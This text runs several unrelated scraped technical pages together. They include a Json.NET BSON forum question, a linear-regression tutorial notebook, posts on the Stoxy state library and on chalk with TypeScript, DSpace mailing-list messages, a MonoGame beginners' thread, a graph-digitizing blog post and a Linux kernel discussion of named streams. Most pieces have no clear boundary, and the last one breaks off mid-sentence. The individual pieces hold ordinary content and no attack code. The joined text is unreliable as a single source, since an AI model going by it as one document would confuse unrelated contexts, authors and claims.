CodePlexProject Hosting for Open Source Software
Hello,
I have been recently testing the Bson Serialization / Deserialization side of your library and have hit something that is causing me a bit of grief. I am sure I have overlooked something, but I am at an impasse and thought I would reach out to
you. I have included a small amount test code below. The primary problem is that when I set the object in the class to an Int32, serialize to a memorystream, then deserialize from the memorystream I end up with the object set to a long, but
with the correct value. I have verified that the value is being read from the stream correctly in the BsonReader.ReadType method as an Integer, yet the object in the deserialized class ends up being a long. Another place you can see something odd
happening is if you set the object to a class object. The object serializes out of the byte array as a Newtonsoft.Json.Linq.JObject instead of the actual class. Do you have any suggestions?
Thank you
simple class:
[Serializable]
public class Test1
{
public int TestVal1 { get; set; }
public object TestVal2 { get; set; }
}
simple console app:
class Program
{
static void Main(string[] args)
{
Test1 t1 = new Test1();
t1.TestVal1 = 12;
t1.TestVal2 = (int)13;
JsonSerializer Js = new JsonSerializer();
MemoryStream Ms = new MemoryStream();
BsonWriter Bw = new BsonWriter(Ms);
Js = new JsonSerializer();
Js.Serialize(Bw, t1);
Bw.Flush();
Ms.Position = 0;
BsonReader Br = new BsonReader(Ms);
Test1 xx = Js.Deserialize<Test1>(Br);
Console.ReadLine();
}
}
Watch window from debug:
- t1 {BsonTest3.Test1} BsonTest3.Test1
TestVal1 12 int
TestVal2 13 object {int}
- xx {BsonTest3.Test1} BsonTest3.Test1
TestVal1 12 int
TestVal2 13 object {long}
Are you sure you want to delete this post? You will not be able to recover it later.
Are you sure you want to delete this thread? You will not be able to recover it later. | https://json.codeplex.com/discussions/268793 | CC-MAIN-2017-09 | refinedweb | 318 | 57.16 |
%load_ext autoreload %autoreload 2 %matplotlib inline %config InlineBackend.figure_format = 'retina'
Neural Networks from Scratch
In this chapter, we are going to explore differential computing in the place where it was most highly leveraged: the training of neural networks. Now, as with all topics, to learn something most clearly, it pays to have an anchoring example that we start with.
In this section, we'll lean heavily on linear regression as that anchoring example. We'll also explore what gradient-based optimization is, see an elementary example of that in action, and then connect those ideas back to optimization of a linear model. Once we're done there, then we'll see the exact same ideas in action with a logistic regression model, before finally seeing them in action again with a neural network model.
The big takeaway from this chapter is that basically all supervised learning tasks can be broken into:
- model
- loss
- optimizer
Hope you enjoy it! If you're ready, let's take a look at linear regression.
import jax.numpy as np from jax import jit import numpy.random as npr import matplotlib.pyplot as plt from ipywidgets import interact, FloatSlider from pyprojroot import here
Linear Regression
Linear regression is foundational to deep learning. It should be a model that everybody has been exposed to before in school.
A humorous take I have heard about linear models is that if you zoom in enough into whatever system of the world you're modelling, anything can basically look linear.
One of the advantages of linear models is its simplicity. It basically has two parameters, one explaining a "baseline" (intercept) and the other explaining strength of relationships (slope).
Yet one of the disadvantages of linear models is also its simplicity. A linear model has a strong presumption of linearity.
NOTE TO SELF: I need to rewrite this introduction. It is weak.
Equation Form
Linear regression, as a model, is expressed as follows:
Here:
- The model is the equation, y = wx + b.
- y is the output data.
- x is our input data.
- w is a slope parameter.
- b is our intercept parameter.
- Implicit in the model is the fact that we have transformed y by another function, the "identity" function, f(x) = x.
In this model, y and x are, in a sense, "fixed", because this is the data that we have obtained. On the other hand, w and b are the parameters of interest, and we are interested in learning the parameter values for w and b that let our model best explain the data.
Make Simulated Data
To explore this idea in a bit more depth as applied to a linear regression model, let us start by making some simulated data with a bit of injected noise.
Exercise: Simulate Data
Fill in
w_true and
b_true with values that you like, or else leave them alone and follow along.
from dl_workshop.answers import x, w_true, b_true, noise # exercise: specify ground truth w as w_true. # w_true = ... # exercise: specify ground truth b as b_true # b_true = ... # exercise: write a function to return the linear equation def make_y(x, w, b): """Your answer here.""" return None # Comment out my answer below so it doesn't clobber over yours. from dl_workshop.answers import make_y y = make_y(x, w_true, b_true) # Plot ground truth data plt.scatter(x, y) plt.xlabel('x') plt.ylabel(.)
Exercise: Take bad guesses
Now, let's plot what would be a very bad estimate of w and b.
Replace the values assigned to
w and
b with something of your preference,
or feel free to leave them alone and go on.
# Plot a very bad estimate w = -5 # exercise: fill in a bad value for w b = 3 # exercise: fill in a bad value for b y_est = w * x + b # exercise: fill in the equation. plt.plot(x, y_est, color='red', label='bad model') plt.scatter(x, y, label='data') plt.xlabel('x') plt.ylabel('y') plt.legend();
Regression Loss Function
How bad is our model? We can quantify this by looking at a metric called the "mean squared error". The mean squared error is defined as "the average of the sum of squared errors".
"Mean squared error" is but one of many loss functions that are available in deep learning frameworks. It is commonly used for regression tasks.
Loss functions are designed to quantify how bad our model is in predicting the data.
Exercise: Mean Squared Error
Implement the mean squred error function in NumPy code.
def mse(y_true: np.ndarray, y_pred: np.ndarray) -> float: """Implement the function here""" from dl_workshop.answers import mse # Calculate the mean squared error between print(mse(y, y_est))
702.42755
Activity: Optimize model by hand.
Now, we're going to optimize this model by hand. If you're viewing this on the website, I'd encourage you to launch a binder session to play around!
import pandas as pd from ipywidgets import interact, FloatSlider import seaborn as sns @interact(w=FloatSlider(value=0, min=-10, max=10), b=FloatSlider(value=0, min=-10, max=30)) def plot_model(w, b): y_est = w * x + b plt.scatter(x, y) plt.plot(x, y_est) plt.title(f"MSE: {mse(y, y_est):.2f}") sns.despine()
Loss Minimization
As you were optimizing the model, notice what happens to the mean squared error score: it goes down!
Implicit in what you were doing is gradient-based optimization. As a "human" doing the optimization, you were aware that you needed to move the sliders for w and b in particular directions in order to get a best-fit model. The thing we'd like to learn how to do now is to get a computer to automatically perform this procedure. Let's see how to make that happen. | https://ericmjl.github.io/dl-workshop/01-differential-programming/01-neural-nets-from-scratch.html | CC-MAIN-2022-33 | refinedweb | 957 | 65.73 |
I'm developing an ICN plugin with a PluginResponseFilter. The structure of my plugin looks like this:
public class FilterPlugin extends Plugin { @Override public String getId() { return "FilterPlugin"; } @Override public String getName(Locale locale) { return "Filter Plugin"; } @Override public String getVersion() { return "1.0"; } @Override public PluginResponseFilter[] getResponseFilters() { return new PluginResponseFilter[] { new Filter() }; } @Override public String getConfigurationDijitClass() { return "myCompany/ConfigurationPane"; } }
If I load this plugin in Content Navigator, it loads just fine, with the exception of an HTTP request to.
ViewerPlugin is the ID of another plugin I developed, but uninstalled a while ago. When I open I get the source code of my Dojo module. This isn't the first time I get the invalid call to the
ViewerPlugin resource, so I suspect Content Navigator cached it and used it ever since. I tried restarting Content Navigator, but that didn't change anything.
Answer by Calvin_Zhang (671) | Apr 27, 2018 at 08:16 PM
Hi,
It may be cached by the browser. Every time the javascript file changed, the browser cache may need to be cleared.
There are 2 ways to load the plugin. One is for class files and one is for jar file. For jar file loading, it needs to be loaded and saved again after change, and also need to reload the whole ICN web page. For class file mode, just need to reload the whole ICN web page and make the change effective.
But the js file and html file change still need to clear the browser cache.
Answer by jase_kross (236) | May 03, 2019 at 05:03 PM
What version of ICN is the plugin loaded into?
Do you have the ability to select individual plugins for the affected desktop? In older versions of ICN all plugins are loaded by default. If you happen to be running one of these versions it may be possible that the desktop is loading a cached ICN database reference to the plugin.
When you loaded the replacement plugin did you overwrite the old one or did you go through the steps to physically delete the plugin via the ICN Administration tool and then create a new plugin and load the jar? If you loaded the plugin over the existing plugin it would create a new plugin entry with a different id and wouldn't remove the old plugin entry from the ICN database. Thus you wouldn't see two different plugins, only the newer plugin. If this is the case you can clean it up by removing the newer plugin then reloading the old plugin before removing it again and finally adding the newer plugin.
156 people are following this question.
Why does callbacks.getP8ObjectStore() return null when called from the Admin desktop? 2 Answers
Calling ICN plugin service from other web app 1 Answer
How can you print all documents, that you get as result of a search ? 1 Answer
icn plugin how to upload file to plugin service? 2 Answers
RAD9.5 , RAD9.6 and ICN 3.0 - any plans for updated JARS? 1 Answer | https://developer.ibm.com/answers/questions/444942/$%7BawardType.awardUrl%7D/ | CC-MAIN-2020-05 | refinedweb | 509 | 63.19 |
Add lines to indicator
Imagine indicator that loads news from data sources list, which was passed by
params. List length is variable.
Now how to add dynamically lines to indicator?
You cannot dynamically add lines. Not because it cannot be done, because the code filling the lines would also have to be changed dynamically and the number of lines would change along the datetime axis.
Ok then is it possible to hide and rename lines? Thus one can add 10 lines with pretty generic names, then hide not necessary one and rename visible?
It seems you are concerned about plotting those lines because you specifically say
hideand thus the assumption that the same applies to
rename.
You can change the
plotlinesinformation for any line.
See Docs - Plotting and specifically the section Line specific plotting options. The
plotlinesinformation can be changed in a live instance.
From
Stochasticfor example
lines = ('percK', 'percD',) ... plotlines = dict(percD=dict(_name='%D', ls='--'), percK=dict(_name='%K'))
Used because
%is not an allowed character in identifiers. And from the
DrawDownobserver
lines = ('drawdown', 'maxdrawdown',) ... plotlines = dict(maxdrawdown=dict(_plotskip=True,))
Here and in other indicators plotlines are static defined. Is
_plotinitright place to redefine it?
Definition only happens when the class is created. At any other time including
_plotinit, things happen in instances and there you can only change the values of the already defined things.
Got it too.
Last question: how to reach exact plotline in loop, not calling it by name? I.e. not like this
self.plotlines.<line_name>._name = 'new'
Studying
AutoInfoClass...
You cannot. What you can do is name the lines sequentially and then access them sequentially.
Could you provide code snippet please?
- backtrader administrators
Standard python ...
lines = ('line1', ..., 'lineX') plotlines = dict( line1=dict(...), ... lineX = dict(...), )
for i in range(1, X + 1): plotline = getattr(self.plotlines, 'line' + i) # do something with the plotline
Thank you for all replies and code snippets.
Here is the beauty:
I suggest you to add options to hide some text to make data cleaner - see red rectangles on image:
- Indicator parameters list;
- Line last value.
Whatever is shown after the name of the indicator can be controlled. See the following excerpt from
RSI:
def _plotlabel(self): plabels = [self.p.period] plabels += [self.p.movav] * self.p.notdefault('movav') return plabels
The method returns a list of strings, with one special provision to use the name of some classes as the text label to automatically support using other indicators.
Thanks!
It's much cleaner now:
Dreaming of
disable showing last valuefeature.
Both
_plotlabeland
_plotinithave now been documented under Docs - Plotting
Am I missing something or there is not option to reach (cancel) this code in
Plot_OldSync.plotind()?
if not math.isnan(lplot[-1]): label += ' %.2f' % lplot[-1]
backtrader is not the 1st platform to plot ... and a common pattern is to plot the last value of the indicator. So far no option to disable it.
This was anyhow not a breaking change, so the
developmentbranch contains now
Control over the last value after the name of the object
- Global:
linevalues(as option to
plotor in a
PlotSchemeinstance)
- Per-object:
plotinfo.plotlinevalues
- Per-line (for indicators/observers):
_plotvalue
Control over the right hand side tag on lines:
- Global:
valuetags(as option to
plotor in a
PlotSchemeinstance)
- Per-object:
plotinfo.plotvaluetags
- Per-line (for indicators/observers):
_plotvaluetag
Part of the small release 1.9.38.116 and added to the plotting documentation
In my particular case
line._plotvalue = False
helps.
Thanks for flexible solution! | https://community.backtrader.com/topic/294/add-lines-to-indicator | CC-MAIN-2017-51 | refinedweb | 584 | 59.4 |
February 15, 2022 • ☕️ 1 min read
After a lot of struggling with getting chalk to work with TypeScript I finally found (in the documentation) that you should just use version 4 of chalk! In the release notes it is stated that:
If you use TypeScript, you will want to stay on Chalk 4 until TypeScript 4.6 is out.
I can now use chalk as follows from TypeScript:
import chalk from "chalk"; console.log(chalk.red("This is red"));
Next problem: color output is stripped when using Lerna.
If you run
lerna run doit --scope mypackage --stream all color output is stripped.
To fix this set the environment variable
FORCE_COLOR=1.
For example in an npm script do the following:
... "run_doit_in_package_mypackage": "cross-env FORCE_COLOR=1 lerna run doit --scope mypackage --stream" ... | https://www.sergevandenoever.nl/chalk-typescript-lerna/ | CC-MAIN-2022-33 | refinedweb | 131 | 74.49 |
You can subscribe to this list here.
Showing
17
results of 17
On Tue, Apr 17, 2012 at 22:46, Alain Tschanz <atschanz@...> wrote:
> I need to change the look of the DSpace front page (version 1.8.1; Manakin).
> I would like to remove “Communities in DSpace” block and add “Advanced
> Search” underneath “Search DSpace” block. Can anybody tell
> me how to accomplish those two things?
Here's how you remove the Browse block:
<xsl:template
</xsl:template>
Regarding adding Advanced search, what exactly would you like to do?
1) Add a link called "Advanced search" or the form itself?
2) Do you mean Search DSpace in the right-hand menu or under
Communities in DSpace?
3) Do you have Discovery enabled?
Regards,
~~helix84
Hi Jose,
I believe this is not a problem and that the only way to influence
processing of mets or dim based on DRI is to save state in a variable
when in DRI and use the variable in mets/dim. Consider this:
<!-- here we are processing DRI -->
<xsl:variable<xsl:value-of
select="/dri:document/dri:meta/dri:pageMeta/dri:metadata[@element='focus'
and @qualifier='container']"/></xsl:variable>
<!-- Generate the info about the item from the metadata section -->
<xsl:template
<!-- here we are processing DIM -->
<table class="ds-includeSet-table">
<xsl:choose>
<xsl:when
<xsl:call-template
</xsl:when>
<xsl:otherwise>
<xsl:call-template
</xsl:otherwise>
</xsl:choose>
</table>
</xsl:template>
I haven't run into a problem with this. That being said, if anyone has
an alternative suggestion, I'd be interested to hear it.
Regards,
~~helix84
Hello,
I need to change the look of the DSpace front page (version 1.8.1; Manakin). I would like to remove "Communities in DSpace" block and add "Advanced Search" underneath "Search DSpace" block. Can anybody tell me how to accomplish those two things?
Thank you.
Alain
I'm in mirage and would like to add some logic to
<xsl:template
In item-view.xsl based on a flag I have added to the DRI xml. Is there a way to do this? Is it better to add the flag to the mets xml file? Would that not violate the METs namespace?
Thank you!
Jose
Hi Sue,
to answer your first question, I'll refer you to my previous post:
Your second question was about metadata field labels - you can define
them in [dspace]/webapps/xmlui/i18n/messages.xml. Just add a new one
on the bottom and you can use it in XSL using the <xsl:i18n> tags.
Let me know if you need more datails.
Regards,
~~helix84
Hi,
We've just finished implementing a test version of Manakin/XMLUI in one of our test DSpace instances, but I can't find any documentation on how to configure which fields display on your short listing for each collection, or where to define the labels for each metadata field. Can someone help me out with this? I tried to do it the same way it works in JSPUI, but couldn't get it to work.
Thanks in advance,
Sue
Sue Walker-Thornton
Software Developer/Database Administrator
NASA Langley Research Center - LITES Contract
susan.m.thornton@...
(W) 757-864-2368
(M) 757-506-9903
Hello,
Unfortunately, it's not clear exactly what you want to customize with
DSpace and which parts of the documentation you have questions on.
Providing us with more specific questions will allow us to better help you.
Without specific questions, all we can provide you with are general
customizations resources.
There are customization details in the 1.8 Documentation:
* JSPUI Customization:
* XMLUI (aka Manakin) Customization:
* General Configuration :
We also have many "how-to" guides (written by other DSpace users)
available on our Wiki. These often provide more specific examples of how
to perform a customization task with DSpace.
*
Finally, there are additional guides available / linked off our wiki
that provide additional help:
*
Please take a look at these resources, and let us know if you have
specific questions.
- Tim
On 4/17/2012 2:54 AM, lokesh.snghl wrote:
>.
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
>
> _______________________________________________
> DSpace-tech mailing list
> DSpace-tech@...
>
Well, I see two separate problems:
"HELO hostname". It looks like you're using a literal "hostname" for
the name of the DSpace host system and your email server doesn't like
that.
In addition, it looks like you have some unescaped nested doublequotes
that are confusing the JSP compiler.
--
Mark H. Wood, Lead System Programmer mwood@...
Asking whether markets are efficient is like asking whether people are smart.
sir,i have added some new browsing or searching options in dspace.cfg file
and after that i rebuild index-init.but no new option is added in dspace
for searching or
browsing.please guide me sir.how can i add new searching or browsing fields
in dspace successfully
Hi:
Do you get an error page or blank page?. If you get a blank page, with your
Dspace template (skin or layout), you should check your solr config and
test the connection with it. I'd this error before I know the solr stats
module.
If you get an error page, check your logs (dspace and web server)
Regards
El 17/04/2012 02:04, "Abhishek Raval" <abhishek@...> escribió:
> Hello All,
>
> Wen i m going to click on "View Statistics" button on Community n
> Collection page i didnt get any report for this. Wat to do ????
>
>
> --
> Thanks n Regards
> Abhishek Raval
> Ph no.-+919601077584
>
>
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
>
> _______________________________________________
> DSpace-tech mailing list
> DSpace-tech@...
>
>
>
Hi everyone,
We're using DSpace 1.7.1 with XMLUI.
We're harvesting some collections via OAI-PMH protocol, making weekly
harvest. Besides, we also have our own content that are not harvest, and
are loaded by ourselves. In addition, some institutions we collect some
content to us. So, we're consumers and source at the same time.
My question is, is there any way to serve via OAI-PMH protocol only the
collections that are loaded by ourselves (not our harvested collections)?
Thanks in advance,
Robert Ruiz.
Hello All,
I have just installed Dspace in UBUNTU 10.04.
The Server runs fine. The only problem i get is "I cannot register users. It looks like the system cannot communicate with the mail server". Off course, i configured well "dspace.cfg" files.
I have attached the log report in this email. Please help me.
Lazaro Luhusa
Sokoine University of Agriculture
Tanzania
Hello All,
Wen i m going to click on "View Statistics" button on Community n
Collection page i didnt get any report for this. Wat to do ????
--
Thanks n Regards
Abhishek Raval
Ph no.-+919601077584
Hi,
On 17/04/12 07:46, Brian Freels-Stendel wrote:
> My suspicion is that there's a bad interaction going on between the
> requests. If you look at the address bar, when the "page not found" is
> served, there's an "/admin" in the mix. I think the admin account's
> request is from an admin page; but logging in as another user tries to
> shunt you to either the home page or that user's page, neither of which
> are under the admin directory.
I think (but haven't looked into it) that logging in as another user
tries to keep you on an admin page -- which doesn't exist for a
non-admin user. The solution probably would be to redirect to the user's
profile page rather than staying on the current page -- somewhere in the
flowscript, presumably.
cheers,
Andrea
--
Dr Andrea Schweer
IRR Technical Specialist, ITS Information Systems
The University of Waikato, Hamilton, New Zealand | http://sourceforge.net/p/dspace/mailman/dspace-tech/?viewmonth=201204&viewday=17 | CC-MAIN-2015-32 | refinedweb | 1,310 | 65.62 |
Suppose you have a graph of a function, but you don’t have an equation for it or the data that produced it. How can you reconstruction the function?
There are a lot of software packages to digitize images. For example, Web Plot Digitizer is one you can use online. Once you have digitized the graph at a few points, you can fit a spline to the points to approximately reconstruct the function. Then as a sanity check, plot your reconstruction to see if it looks like the original. It helps to have the same aspect ratio so you’re not distracted by something that doesn’t matter, and so that differences that do matter are easier to see.
For example, here is a graph from Zwicker and Fastl’s book on psychoacoustics. It contains many graphs with no data or formulas. This particular one gives the logarithmic transmission factor between free field and the peripheral hearing system.
Here’s Python code to reconstruct the functions behind these two curves.
import matplotlib.pyplot as plt import numpy as np from scipy import interpolate curve_names = ["Free", "Diffuse"] plot_styles = { "Free" : 'b-', "Diffuse" : 'g:'} data = {} for name in curve_names: data = np.loadtxt("{}.csv".format(name), delimiter=',') x = data[:,0] y = data[:,1] spline = interpolate.splrep(x, y) xnew = np.linspace(0, max(x), 100) ynew = interpolate.splev(xnew, spline, der=0) plt.plot(xnew, ynew, plot_styles[name]) logical_x_range = 24 # Bark logical_y_range = 40 # dB physical_x_range = 7 # inch physical_y_range = 1.625 # inch plt.legend(curve_names, loc=2) plt.xlabel("critical-band rate") plt.ylabel("attenuation") plt.xlim((0, logical_x_range)) plt.axes().set_aspect( (physical_y_range/logical_y_range) / (physical_x_range/logical_x_range) ) ax = plt.gca() ax.get_xaxis().set_ticks([0, 4, 8, 12, 16, 20, 24]) ax.get_yaxis().set_ticks([-10, 0, 10, 20, 30]) plt.show()
Here’s the reconstructed graph.
10 thoughts on “How to digitize a graph”
Hi,
I try to run but it generates an error in line:
>>>np.loadtxt(“{}.csv”.format(name), delimiter=’,’)
No such file or directory: ‘Free.csv’
Could you suggest anything?
Thanks
It’s a reference to a data file I didn’t post online. You could digitize your own graph and use its data.
I see.
Could you add your data file to try it?
Because I dont know how I can do to obtain a cvs file from a digitized graph.
Thanks, John! That’s a useful tool.
Engauge is what I used and recommend to everyone. Easy to use, yet has advanced features. It can also save post-processed figures for later changes or audit. WebPlotDigitizer has only Windows offline version and does not have continuous integration setup.
Hi John,
I have a question did you download the graph as a .png file then converted it to .csv?
If I remember correctly, I uploaded an image to the web site mentioned in the post and it produced a csv.
Thank you – I like the way you set up your plot parameters as well. There are many ways to “skin a cat” –or “skin a potato” if you want to use PETA phrases ;) — but this is a nice example of hard-coding the axis limits and ticks.
Also a note – the web plot digitizer has moved to
Thanks. I updated the link.
I prefer PlotDigitizer () over WebPlotDigitizer. It is better and more stable than the latter. | https://www.johndcook.com/blog/2016/04/20/how-to-digitize-a-graph/ | CC-MAIN-2022-27 | refinedweb | 553 | 68.97 |
Stoxy is a modern state management library built around creating reactive, stateful and persistent web experiences.
Stoxy allows you to easily control the global state of your application, and tap into said state when needed.
The newest addition to Stoxy is a new add-on library: Stoxy Hooks.
Stoxy Hooks are a easy way to integrate Stoxy to any React or Preact application.
Examples
Here I'll show a few simple examples of Stoxy Hooks in action
A Simple Clicker
import { useStoxy } from "@stoxy/hooks"; import React from "react"; export function Clicker() { const { state, update } = useStoxy(React, { key: "demo.counter", state: 0 }); function inc() { update(c => c += 1); } return ( <div> <p>Pushed {state} times</p> <button onClick={inc}Click</button> </div> ); }
A Todo List
import { useStoxy } from "@stoxy/hooks"; import * as preact from "preact/hooks"; export function TodoList() { const { state } = useStoxy(preact, { key: "todo-list", state: { items: [] }, init: true, persist: true }); return ( <ul> {state.items.map(item => <li key={item.id}>{item.name}</li>)} </ul> ); }
import { useStoxy } from '@stoxy/hooks'; import React from 'react'; export function AddToList() { const { add } = useStoxy(React, { key: 'todo-list' }); function addItem(e) { e.preventDefault(); const formData = new FormData(e.target); const taskName = formData.get('task'); add({ created: Date.now(), name: taskName }); const inputField = document.querySelector("input[name='task']") inputField. <input type="submit" value="Add" /> </form> ); }
You can easily get started using Stoxy hooks with just one quick install:
npm install @stoxy/hooks
And you're all set!
The whole Stoxy ecosystem is extremely lightweight, in package size and when writing code.
Read more about the subject on the Stoxy Website
If you like how Stoxy makes managing state simple, Join the almost 50 Stargazers on GitHub
Discussion (3)
Is Stoxy using indexedDB?
Yes! Stoxy uses IndexedDB to persist the state data, and lighten the cache on complex applications.
Read more about it here: stoxy.dev/docs/
Cool I work on a similar thing for the last few weeks 🤣 I'm currently at a point where I want to make form inputs to work I see you solved it also very nice | https://practicaldev-herokuapp-com.global.ssl.fastly.net/matsuuu/getting-hooked-on-stoxy-1fh4 | CC-MAIN-2021-21 | refinedweb | 346 | 54.42 |
An important part of building software is testing it, ensuring it works and identifying its flaws. The write-up describes a few basic aspects of testing.
A test case is an example in which the correct behavior of the software is known, generally one in which there is some expectation that some software might be incorrect.
The possible set of test cases is usually infinite, so exhaustive testing is not generally possible. Even a simple function like
len takes in a string, and there are infinitely many strings possible. Who knows if
len('d&sdf78 Zdfg ') won’t be the one case that fails, even though
len('d&sdf78 Zdff ') passed?
One option is proof: software has a mathematical basis, and it is possible to create proofs of correctness. Proofs are little used, in part because they require more mathematical expertise of the programmer, and will not be taught in this course for that reason as well. If you are interested, one of the best-known projects to contain such proofs was seL4.
More common is the adoption of a test suite, a set of test cases that we hope will discover a bug if a bug exists. Selection of tests for test suites tends to be based on analysis of equivalence classes and corner cases, along with a few other techniques we won’t cover.
To explore this more, we’ll look at the
abs function for finding absolute values.
If we assume that software was written by a normal non-malicious human, we can probably assume they did not add extra code for the purpose of making their program break in strange ways. This in turn generally means that they treat large swaths of inputs the same way. These probably-the-same swaths are called equivalence classes.
For example, if
abs(8) works then it is highly unlikely that
abs(9) will fail. This is because
positive integers is a likely equivalence class for
abs.
Equivalence classes vary by task. For example,
positive integers is probably not an equivalence class for
divided_by_2, but
even positive integers might be.
It is good practice to try to split the entire space of inputs or arguments into equivalence classes, such as
intarguments
intarguments
0
intarguments
floatarguments
floatarguments representing integers
floatarguments representing non-integers
0.0
floatarguments representing integers
floatarguments representing non-integers
In general, for each equivalence class you should
1)
1138)
Sometimes there are special cases that might behave differently than others. Examples include
abs(0),
math.tan(math.pi / 2),
len(""), etc.
You should always test all of the corner cases if you can.
Sometimes cases that should break the program are also called corner cases; for example, what should
abs("hi") return?
In Python, function names without their parentheses are just variables, and can be used to pass functions as arguments to other functions. This enables us to create functions that test other functions
def is_abs(func): # integers if func(0) != 0: return False if func(1) != 1: return False if func(1138) != 1138: return False if func(-1) != 1: return False if func(-3330) != 3330: return False # floating-point numbers if func(0.0) != 0.0: return False if func(-0.0001) != 0.0001: return False if func(0.0001) != 0.0001: return False ... return True if is_abs(abs): print('build-in function abs passed all tests') else: print('build-in function abs failed at least one test') def my_abs(x): if x < 0: return -x return x if is_abs(my_abs): print('my function my_abs passed all tests') else: print('my function my_abs failed at least one test') def bad_abs(x): if x < 1: return -x return x if is_abs(bad_abs): print('my function bad_abs passed all tests') else: print('my function bad_abs failed at least one test')
Functions that test other functions are just the first step into code that tests code; Python comes with two more advanced tools (unittest and doctest), which make use of some parts of the Python language we haven’t discussed yet, and entire companies has grown out of the need to even more advanced tools. | http://cs1110.cs.virginia.edu/testing.html | CC-MAIN-2017-43 | refinedweb | 685 | 62.07 |
I took this example here to test out some AspectJ features.
If I put a breakpoint on the System out here I can hit it just fine.
@Aspect
public class TestAspect {
@Before("execution (* com.aspectj.TestTarget.test*(..))")
public void advice(JoinPoint joinPoint) {
System.out.println("TestAspect.advice() called on '%s'%n", joinPoint);
}
}
However, if I change it to an @Around joinpoint the breakpoint is not hit but the console shows that the code in the joinpoint was run.
@Around("execution (* com.aspectj.TestTarget.test*(..))")
public Object advice(ProceedingJoinPoint invocation) throws Throwable {
System.out.println("Around TestAspect.advice() called on '%s'%n", invocation);
return null;
}
Is there a reason why the @Around is not hit? It doesnt get hit in eclipse either.
Decompiling bytecode shows that in the latter case the advice is inlined as a synthetic method in the TestTarget class, so that actuallTestAspect.advice() method is never executed. | https://intellij-support.jetbrains.com/hc/en-us/community/posts/206156169-AspectJ-Why-Don-t-Around-JoinPoint-Breakpoints-Get-Hit- | CC-MAIN-2019-26 | refinedweb | 149 | 50.02 |
Hi, I’m new and I want to know if exists a better way to learn monogame?
P.S. I’m sorry if I express-ed myself badly, but I’m still learning English
Hi, I’m new and I want to know if exists a better way to learn monogame?
P.S. I’m sorry if I express-ed myself badly, but I’m still learning English
By “better way” what do you mean?
Also, there are plenty ways you can learn MonoGame, you can start by reading the tutorials in the documentation, or watch XNA Video Tutorials, is the same thought.
P.S: Learning english too.
Hi
Better than what?
Look for xna tutorials on google it is the same matter of things, you should find one thats fits your needs (riemers for ex)
Unfortunately, you have asked a very prescient question that the game development community has yet to provide a cognizant answer for.
Despite the many tools available and some of the excellent tutorials and documents that go along with these tools, game development is still pretty much a Black Art.
It remains so, much as CICS or communications programming did in the age of the mainframe era (of which I came out of) so that only a small group of professional developers could command very high salaries.
This aspiration is not really the same for game development but the end result is the same; only a small, select group in this aspect of the IT industry manage to get to the top of the ladder and are able to produce games that command a good revenue stream. Whether this is intentional or not is not known but may be more of a result of the inherent difficulties in learning to develop a game programmatically and well than anything else, along with the length of time it takes to develop a really high quality game
It has taken me years of research, time, and effort just for me to be able to develop the project I am currently working on and produce the technical articles that I offer on this forum for people who are interested in the type of game development I am pursuing (military simulation/war-game). And a lot of this effort has been allayed by my professional responsibilities when I was working in the corporate environments.
Based on all this here is what I can suggest…
First, research carefully the type of game you are interested in developing since each game type has different requirements and techniques for its development.
There is no one size that fits all in game development except at the most basic levels. However, game development environments like Unity attempt to provide a level of seamless integration between game genres.
Next, begin to learn just the basics for getting graphics on the screen with MonoGame. Tinker with simple primitive drawings and animations, all of which can be found in many basic tutorials for XNA, which are still around and quite prevalent. Books on XNA are still readily available on Amazon.
And since MonoGame is merely a reflection of the basic XNA namespaces and APIs (but slowly becoming far more advanced), you will have no trouble working with MonoGame using XNA constructs.
Once you feel comfortable working with basic graphic technologies in MonoGame you can then begin to branch out and begin researching and studying the techniques for the type of game design you are interested in building. Aerial simulations and war-game development are two of the most complex game development projects you can endeavor to build since the research material is scant and spread out all over the place, not because there is some unique attribute that makes such development any harder than a programmed First Person Shooter.
By the way for aerial simulation you will need to know advanced mathematics such as physics. Some of the most advanced of these types of simulations are Rise of Flight (WWI), IL2-Sturmovik (WWII), and Digital Combat Simulator (DCS), the latter which covers multiple periods. However, if this is your interest than these are the standards to set your aspirations to.
First Person Shooters and Adventure Games are somewhat easier to develop. Again, not because they are inherently easier to develop but because of their popularity there is quite a bit more information available on the various techniques used to support such development.
2D Side-Scrollers and such games as Tetris clones are probably the easiest types of games to develop simply because so many tutorials provide examples on how to program them.
Once you decide on the game type you want to work with, stick with it because the research will be long and arduous.
Use these forums for MonoGame to ask specific questions with issues you are having in learning the engine as the people here are very helpful.
If you want some additional assistance with war-game or military simulation development I can give you a hand with that. Just leave me note here or contact me through my website,
See if you can get hold of this book in your country:
EDIT
It is also available on Kindle | https://community.monogame.net/t/learn-monogame/9443 | CC-MAIN-2022-40 | refinedweb | 863 | 52.23 |
On Tue, Sep 07, 2004 at 01:55:32PM +0200, Christer Weinigel wrote:> David Masover <ninja@slaphack.com> writes:> > > |>Second, there are quite a few things which I might want to do, which can> > |>be done with this interface and without patching programs,> > | Such as?> > They've been mentioned.> > > | Haven't seen any that made sense to me, sorry.> > Sorry if they don't make sense to you, but I don't feel like discussing> > them now. Either you get it or you don't, either you agree or you> > don't. Read the archives.> > Great argument. Not. There has been so much shit thrown around here> so that it's impossible to keep track of all examples.> > Could you please try summarize a few of the arguments that you find> especially compelling? This thread has gotten very confused since> there are a bunch of different subjects all being intermixed here.> > What are we discussing?> > 1. Do we want support for named streams?> > I belive the answer is yes, since both NTFS and HFS (that's the> MacOS filesystem, isn't it?) supports streams we want Linux to> support this if possible.well, yes HFS has this, is it advantageous, noit's kind of heritage ...> Anyone disagreeing?yes, MacOS X allows to use UFS instead of HFS+which doesn't support the fancy/confusing streamsI, for my part, do not like the idea of multiplestreams for one file, IMHO all features can beprovided by using directories instead, which doesnot break any userspace tools _and_ sounds naturalto me ...best,Herbert> 2. How do we want to expose named streams?> > One suggestion is file-as-directory in some form.> > Another suggestion made is to expose named streams somewhere under> /proc/self/fd.> > Yet another suggestion is to use the openat(3) API from solaris.> > Some filesystems exposes extra data in a special directory in the> same directory as the file, such as netapps .snapshot directories> or the extra directories that netatalk expects. This has the> advantage that it even works on non-named stream capable> filesystems, but it has a lot of problems too.> > Linux already has limited support for names streams via the xattr> interface, but it's not a good interface for people wanting to> have large files as named streams.> > 4. What belongs in the generic VFS, what belongs in Reiser4?> > Some things reiser4 do, such as files-as-directories need changes> to the VFS because it breaks assumptions that the VFS makes> (i.e. a 